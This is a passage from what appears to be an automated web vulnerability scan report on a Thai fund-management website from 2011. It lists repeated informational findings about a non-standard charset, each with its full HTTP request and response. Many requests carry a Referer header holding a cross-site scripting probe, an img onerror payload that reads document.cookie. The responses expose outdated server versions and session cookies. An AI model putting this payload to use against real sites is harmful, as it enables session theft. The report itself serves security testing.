<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.64. http://www.ktam.co.th/en/index.php/ims/i_flash.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/i_flash.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/i_flash.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:49 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29477

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.65. http://www.ktam.co.th/en/index.php/ims/i_winmedia.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/i_winmedia.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/i_winmedia.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:51 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29480

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.66. http://www.ktam.co.th/en/index.php/ims/mails.png  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/mails.png

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/mails.png HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:39 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29475

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.67. http://www.ktam.co.th/en/index.php/ims/news.php  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/news.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/news.php HTTP/1.1
Host: www.ktam.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:37:22 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29472

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.68. http://www.ktam.co.th/en/index.php/ims/p_flag_th.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_flag_th.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/p_flag_th.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:39 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29479

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.69. http://www.ktam.co.th/en/index.php/ims/p_ktamnew.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_ktamnew.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/p_ktamnew.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:43 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29479

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.70. http://www.ktam.co.th/en/index.php/ims/p_ktamonline.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_ktamonline.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/p_ktamonline.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:43 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29482

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.71. http://www.ktam.co.th/en/index.php/ims/p_line001.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_line001.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/p_line001.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:07 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29479

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.72. http://www.ktam.co.th/en/index.php/ims/p_line002.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_line002.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/p_line002.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:18 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29479

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.73. http://www.ktam.co.th/en/index.php/ims/p_link01.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_link01.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/p_link01.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:45 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29478

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.74. http://www.ktam.co.th/en/index.php/ims/p_link02.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_link02.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/p_link02.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:45 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29478

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.75. http://www.ktam.co.th/en/index.php/ims/p_link03.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_link03.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/p_link03.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:47 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29478

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.76. http://www.ktam.co.th/en/index.php/ims/p_link04.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_link04.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/p_link04.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:47 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29478

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.77. http://www.ktam.co.th/en/index.php/ims/p_link05.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_link05.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/p_link05.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:47 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29478

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.78. http://www.ktam.co.th/en/index.php/ims/p_link06.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_link06.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/p_link06.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:47 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29478

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.79. http://www.ktam.co.th/en/index.php/ims/p_logo1.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_logo1.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/p_logo1.gif HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:25:56 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29477

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.80. http://www.ktam.co.th/en/index.php/ims/p_word1.gif  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_word1.gif

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/ims/p_word1.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:39 GMT
